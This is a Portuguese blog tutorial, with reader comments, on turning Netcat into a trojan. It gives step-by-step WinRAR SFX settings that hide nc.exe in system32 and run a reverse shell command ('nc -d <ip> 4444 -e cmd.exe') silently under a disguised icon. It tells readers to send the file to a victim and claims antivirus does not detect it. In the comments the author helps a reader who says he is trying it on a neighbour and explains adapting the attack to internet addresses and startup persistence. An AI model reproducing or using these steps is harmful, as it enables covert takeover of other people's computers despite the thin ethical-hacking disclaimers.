Backdoor com Netcat

O Netcat é uma ferramenta utilizada por Hackers para abrir portas no computador ou servidor e estabelecer conexões sem que seja notado pelo usuário ou administrador da maquina.

Disponível para plataforma Unix, Linux, Windows e Macintosh o Netcat é uma poderosa ferramenta que permite gerenciar e executar comandos em estações remotamente (Ferramenta utilizada para criação de redes zumbis), como dizem é um canivete suíço para arsenal Hacker.

Neste artigo estarei utilizando o BackTrack 5 para realizar acesso em uma maquina Windows 2003 Server.

 

Comandos Netcat

Antes de criar o script responsável por estabelecer a conexão com o alvo, devemos conhecer alguns parâmetros da ferramenta:

l = Coloca uma porta em estado de escuta;
L = Coloca uma porta em escuta, reabrindo a porta caso ela feche;
P = Define uma porta que será estabelecida a conexão;
V = Ativa o recebimento de eco;
U = Utiliza o protocolo UDP ao invés do TCP;
T = Conectar a Telnet;
O = Gerar Log;
W = Determina o tempo máximo para aguardar uma resposta;
E = Redireciona arquivos;
D = Coloca o Netcat em modo furtivo, ou seja, permanece carregado em memória;

Um exemplo de como colocar uma porta em escuta:
[email protected]:~# nc –v –l –p 4444
listening on [any] 4444 …

Neste exemplo, abri uma escuta na porta 4444, a opção –v é para que a saída do comando fosse exibida.

 

Criando um Trojan com o Netcat

Agora que conhecemos um pouco os comandos da ferramenta, vamos criar um trojan muito simples, rápido e extremamente poderoso, estarei utilizando uma estação Windows para criar o trojan e enviar para a vitima (que também deve estar utilizando Windows como SO) e uma maquina Linux com o BackTrack como servidor que será responsável por executar os comando na vitima.
Lembrando que o BackTrack já possui o Netcat instalado.

 

Preparando o Ambiente

Para criar, será necessário apenas duas ferramentas o Netcat propriamente dito e o Winrar para criar um arquivo executável e ocultar o Netcat.

Primeiramente, faça o download do Netcat para Windows – Download Netcat
Depois faça o download do Software Winrar – Download Winrar

 

Descompacte o arquivo, entre na pasta e localize o arquivo nc.exe, clique com o botão direito em cima do arquivo e escolha a opção Adicionar para o arquivo…

imagem001

 

Selecione a opção Criar arquivo SFX e clique na aba avançado.

imagem002bmp

 

Na aba avançado, clique no botão Opções SFX…

imagem003

 

Na tela de opções avançadas do SFX, seleciona a aba geral, no campo caminho para extração, coloque como destino o diretório C:\windows\system32, pois o nc.exe irá utilizar o arquivo cmd.exe que se encontra no diretório system32, e outro motivo é que são poucas pessoas que apagam arquivos dentro do diretório system32 😉

No campo “Executar após a extração”, vamos inserir os comando para que o Netcat estabeleça uma conexão com o servidor que irá esperar a conexão do outro lado, utilizando o seguinte parâmetro:
nc –d 192.168.1.101 4444 –e cmd.exe

imagem004

 

A Sintaxe do comando é muito simples:
-d: Refere-se o servidor que estará esperando a conexão do computador da vitima, no meu caso é o IP 192.168.1.101.
4444: é a porta no qual o servidor irá escutar do outro lado, não precisa ser a porta 4444, pode ser utilizada outra porta.
-e: faz com que o comando nc seja redirecionado para o prompt de comando do Windows no caso o cmd.exe.

Ainda em Opções avançadas do SFX, clique na aba Métodos e selecione a opção Ocultar Tudo. Isso faz com que todo o processo seja ocultado, de forma que o usuário final não veja que esta sendo instalado um programa malicioso na maquina.

imagem005

 

Para finalizar, vamos acrescentar alterar o ícone do nosso trojan, isso para disfarçar ainda mais o programa.

Clicando na aba Texto e Ícone, insira o caminho de alguma imagem .ico no campo Carregar ícone SFX do arquivo, isso fará com que nosso trojan seja ainda mais oculto para o usuário.

imagem006

Ícone do Trojan: imagem007

Após este processo, o trojan já está pronto! Encaminhe o arquivo para á vitima!

Com o nosso trojan pronto e encaminhado á vitima , o próximo passo é fazer com que o servidor “Hacker” fique escutando na porta 4444 aguardando a conexão com a vitima.

Para isso abra o terminal no servidor e digite o seguinte comando e deixe ele sendo executado até estabelecer a conexão com a vitima:

[email protected]:~# nc –l –n –p 4444 –vv
listening on [any] 4444 …

Após a vitima clicar no trojan, no servidor já ira aparecer o console da maquina, agora você já esta conectado a vitima e possui controle total a maquina.

imagem009

 

Para reforçar minhas dúvidas com relação à detecção do Netcat, realizei testes com diversos antivírus e nenhum identificou o nc.exe como vírus ou trojan.

Particularmente gostei muito desta ferramenta, levando em consideração ao lado de pentest, ela é uma mão na roda para auxiliar a invasão dentro de uma rede aonde você não conhece o IP do servidor, porem conhece e-mails de usuários internos.

O maior perigo esta na rede interna, aonde a maioria dos profissionais se esquecem de que os usuários não possuem conhecimento adequado quando falamos de segurança e também aonde se encontra a maior falha de segurança, devido às regras e estratégias de segurança.

Lembre-se! Utilize essa informação para o bem! Seja um Hacker Ético!

Referencia: BackTrack 4 Assuring Security by Penetration Testing

Our tought

  1. JP gostaria de saber se desse modo posso visualizar o video da webcam da “vitima” ou apenas enviar comandos para a maquina iva cmd
    se tiver como criar um trojan exclusivamente para ver e ouvir ou ate msm
    visualizar tudo o que a “vitima faz em sua maquina” em tempo real e nao apenas por meio de prints ok espero qe possas me ajudar

    qeria ter um trojan mas nao desses baixados na net mas sim um criado por min desde ja grato

    1. Junior, com o NetCat não é possível, pois ele apenas abre uma porta no computador e se conecta ao Servidor Hacker, para isso você irá precisar utilizar Framework especifico para invasão, eu já utilizei o Metasploit Framework, onde ele possui um ambiente gráfico chamado Armitage.
      Essas ferramentas vem por padrão no Backtrack, o esquema do Metasploit é trabalhar via linha de comando, porem você precisa conhecer muito bem os protocolos e exploração de vulnerabilidades.
      Por favor utilize as informações só para adquirir o conhecimento, pois invasão e roubo de informações é crime!

      Abraço!

  2. muito bom seu tuto!! poderia me dizer se funfa no win7 to tentando aqui com meu vizinho e nao da ele disse que quando executa tipo aparece mensagem como se nao tivesse instalado corretamente ja desabilitamos as restriçoes de usuario que vem no win7 mas ate agora nao conseguimos..obrigao amigo. xD

    1. Sim, funciona também no Windows Seven, Você já verificou se a porta que vocês estão realizado os testes não possui bloqueio? As vezes as operadoras bloqueiam portas para evitar esses tipos de problemas.

      Tenta executar o arquivo e realizar um telnet na porta.

      Testei em meu ambiente e funcionou perfeitamente no Windows Seven.

      Lembre-se que invasão é crime, realize todos os testes em laboratórios com máquinas virtuais, pois estes programas permitem abrir vulnerabilidade para “boot net” acessar a máquina e controlar o SO.

      Abração!

  3. Boa tarde, uma duvida, mas ele só vai funcionar se a vitima executar o arquivo certo? tem uma forma dele executar na inicialização do sistema, windows no caso, sem que o firewall peça permissão para executar? Obrigado.

    1. Olá Edu! desta para utilização do NetCat é necessário a execução do aplicativo, porem se você conhece um pouco mais de programação e qual SO a vitima está utilizando, é possível criar um script que ao ser executado ele copie para um diretório de inicialização ou crie um serviço para o NetCat, porem precisa conhecer muito bem o SO e programação.

      Caso queira aprender algo mais a fundo, aconcelho a aprender a utilizar o Metasploit Framework, ele utiliza um exploit nativo que é enviado junto ao Payload consegue o acesso a maquina com vulnerabilidades!

      O Metasploit é muito complexo e possui várias ferramentas para analise de vulnerabilidade, e para isso é preciso conhecer um pouco sobre pacotes, protocolos e a camada OSI.

      Lembre-se utilize o conhecimento para o bem! Roubo de informação e Defacement é crime! 🙂

  4. Adorei o ensinamento porém me parece que funciona em ambiente de rede local (192.168.x..y). E se os endereços fossem de Internet??? Como poderiamos adaptar esse exemplo?

    Grato

    1. Fala Curioso! Beleza?
      É a mesma coisa, a unica coisa que muda é o IP de WAN.
      Vale apena lembrar que em ambiente WAN você pode ter restrições devido portas abertas de operadoras e também por causa de Firewall.

      Abraço!

  5. ola JP gostei mto do tutorial eu estou estudando sobre como ser uma hacker para trabalhar em empresas como vc, e todos estao dizendo q eu preciso de um livro de programaçao e queria q vc me recomenda-se um já q estudou mto na area , ja mudei meu sistema para linux e estudo ate tarde sobre; e queria ter a recomenda-ção de um profissional

    1. Olá Alessandro, tudo bom?
      A Segurança da informação é uma área muito complexa e necessita de um conhecimento em vários ambientes (Windows, Linux, BSD, etc).

      A primeira recomendação é conhecer o seu “dom” e seu gosto, procurar ler um pouco sobre os assuntos relacionados á infraestrutura e programação (nível básico), pois isso irá lhe ajudar, á saber exatamente o seu gosto e qual área você se adapta mais rápido.

      Caso você já tenha certeza que irá para a área de programação é extremamente necessário conhecer mais do que uma linguagem (indico a linguagem C e Perl), até comecei a aprender Perl, porem hoje estou estudando C a fundo, pois é uma linguagem bem interessante mesmo o Perl sendo mais fácil de programar, me identifique mais com o C (Sendo que os melhores Malwares e BotNet São desenvolvidos em C) o Perl é utilizado muito para Exploit (principalmente no Metasploit Framework).

      Hoje trabalho na área de Infra, uma área que estou me dedicando á mais de 6 anos e que identifiquei desde o começo da minha carreira na TI. Gosto de criar regras em Firewall (Iptables) Gerenciar Firewall Dedicados (SonicWall)e brincar com o Snort e trabalhar com Router e Switch!

      Uma dica extremamente importante é conhecer um pouco de tudo, mesmo trabalhando com uma área, é necessário conhecer a outra para saber até que ponto você consegue chegar e como chegar! Conheça o protocolo OSI e TCP, mesmo que não utilize muito você irá conhecer como funciona a comunicação, os protocolos que fazem a conexão, etc.

    2. Hoje trabalho com plataforma Windows (Participo do Technet Brasil) e Linux (Não participo das comunidades do Linux devido o apoio ao movimento da regularização de profissionais de TI no Brasil), já usei o BSD (Porem não gostei muito), estou desenvolvendo alguns materiais de programação em C e segurança para começar a postar o ano que vem (2013), todos referentes a segurança e de baixo nível!

    3. Alguns dos livros que eu li e indico:
      CEH Certified Ethical Hacker
      Redes de Computadores (Gabriel Torres)
      Universidade H4ck3r
      Servidores Linux – Guia Prático (Marimoto)

      Para programações eu procuro ler em sites como o http://construindooaprender.blogspot.com.br/ e http://br-c.org

      Estou para compara os livros que o Greg Kroan-Hartman comenta na palestra da Kernelnewbies.org (O cara manja de C)

      Para ver, acesse a pagina abaixo:
      http://www.youtube.com/watch?feature=player_embedded&v=LLBrBBImJt4

  6. Ola !
    existe alguma maneira de eu abrir a porta de um computador que esta na minha rede, mas sem eu ter acesso a ele ou enviar um arquivo ?
    pois notei q ele possui a porta 25 aberta.. teria alguma maneira de eu ter acesso ao computador desta pessoa pela porta 25 ?
    Obrigado !

    1. Olá Marco, tudo bom?

      Não é possível abrir portas sem ter acesso ao computador, porem…
      Existem várias maneiras de se conseguir acesso á um servidor sem enviar arquivos, porem você precisa ter um conhecimento avançado em TI!

      A porta 25 é do Serviço de SMTP, provavelmente você não vai conseguir invadir por esta porta (ao menos que o serviço possua vulnerabilidade crítica no SMTP).

      Não posso passar uma receita de bolo porque muitas vezes não funciona pois varia de ambiente para ambiente, entre outros fatores, porem o básico seria realizar um scanner na maquina e coletar informações sobre os serviços, se possui alguma vulnerabilidade crítica e em seguida aplicar um Exploit ou outra forma de ataque (Por este motivo precisa conhecer bem o Sistema Operacional, Protocolos, serviços e acima de tudo a Segurança da Informação).

      As vezes “Invadir” um computador ou aplicação é mais difícil do que se parece, variando desde a aplicação, Sistema Operacional até configurações de segurança.

      Lembre-se!
      Utilize seu conhecimentos para o bem! Seja um Hacker ético!

      Abraço!

    1. Não precisa, o arquivo compactado pelo Winrar e transformado em exe já é um executável “Stand-Alone” do Netcat.

      Caso não consiga, verifique primeiro se o server está rodando, pois o cliente só estabelece a conexão e não mantem o serviço rodando caso o server esteja Off-line.

      Ativar o Servidor na maquina Hacker:
      [email protected]:~# nc –l –n –p 4444 –vv
      listening on [any] 4444 …

      Abraço!

  7. Olá, muito bom esse tutorial… eu venho procurando há muito tempo uma vídeo aula ou tutorial no qual o objetivo é injectar um server trojan através do backtrack, eu vi uma vídeo, mas a pessoa não ensinou apenas fez… e no fim deu resultado, o PC da vitima subiu no trojan… tem algo parecido com essa vídeo por aqui ? Obrigado desde já.

    1. Olá Luan!
      Neste caso é utilizado Exploits no qual você consegue ganhar controle da maquina remotamente através de falhas em serviços desatualizados, uma boa ferramenta é o Metasploit Framework, estarei fazendo um guia básico para utilizar esta ferramenta e em breve estarei colocando aqui no meu blog.

      Agradeço pela sua visita!

  8. João, Boa noite

    Preciso de sua ajuda,
    onde consigo o IP de uma maquina para que eu possa acessar remotamente ? pelo NC como você ensinou a criar.
    Estou tendo problemas nessa parte.
    Sei que consigo o IP do provedor de internet da Maquina que eu quero, mas não consigo comunicação pelo NC na maquina.
    Pode me ajudar..
    agradeço desde já.
    Att
    Lie

    1. Olá Lie!
      Quando falamos de conexão backdoor, falamos de conexão client to server, ou seja, a conexão deve partir do cliente para o servidor desta forma você não precisa saber o IP da maquina pois a maquina irá se conectar de forma automática no servidor (no caso a maquina Hacker atacante). O grande desafio é fazer com que o cliente consiga se conectar no servidor… o NC é muito bom porém hoje em dia é muito fácil de se identificar com IDS por isso o legal é desenvolver seu próprio Backdoor.

Add your review

Your email address will not be published. Required fields are marked *